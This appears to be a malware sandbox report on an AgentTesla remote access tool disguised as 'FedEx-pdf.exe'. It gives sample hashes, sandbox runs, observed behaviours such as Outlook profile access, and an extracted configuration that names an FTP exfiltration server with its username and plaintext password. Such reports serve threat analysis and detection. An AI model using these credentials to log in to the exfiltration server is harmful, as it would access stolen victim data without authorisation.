General
-
Target
8a9730571569678290789c40e0b578d09be5d2d5550f101d85c14c16ba770748
-
Size
1.0MB
-
Sample
220521-m76qzagchj
-
MD5
5ff4a422bda50b61b8667bb1ff337e82
-
SHA1
c769502af540ea51c3387ea365365a02e800e683
-
SHA256
8a9730571569678290789c40e0b578d09be5d2d5550f101d85c14c16ba770748
-
SHA512
cf70598663311ab51b71c28370f8f8028ef5d1644b3c3d7abbe128fce8c3a0242ae5078ec9aa3433933038afec89107964dcd5e03cac47d506af8c1b5491a4c7
Static task
static1
Behavioral task
behavioral1
Sample
????????????? FedEx-pdf.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
????????????? FedEx-pdf.exe
Resource
win10v2004-20220414-en
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.kassohome.com.tr/ - Port:
21 - Username:
bringlogs@kassohome.com.tr - Password:
J%jCb2L=!5~E
Protocol: ftp- Host:
ftp://ftp.kassohome.com.tr/ - Port:
21 - Username:
bringlogs@kassohome.com.tr - Password:
J%jCb2L=!5~E
Targets
-
-
Target
????????????? FedEx-pdf.exe
-
Size
1.4MB
-
MD5
cd5f67b3a7d561a47a7896e9b8bc3a6a
-
SHA1
223b276114143e3704e95964e91d02a8af277753
-
SHA256
6fb3eca3bc35ceba9ce806f93a2855cec717897923851643f40e62dcecc2f14f
-
SHA512
ee9ca4ed880b58d1d60b169342d98d49d4595a2b757dedfbce78841325524e9c17e9e69c4c029dc3c3050528a9eb93a0d6cb6d2c82fefc7f6d2afa99cbc83a9a
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
AgentTesla Payload
-
Accesses Microsoft Outlook profiles
-
Suspicious use of SetThreadContext
-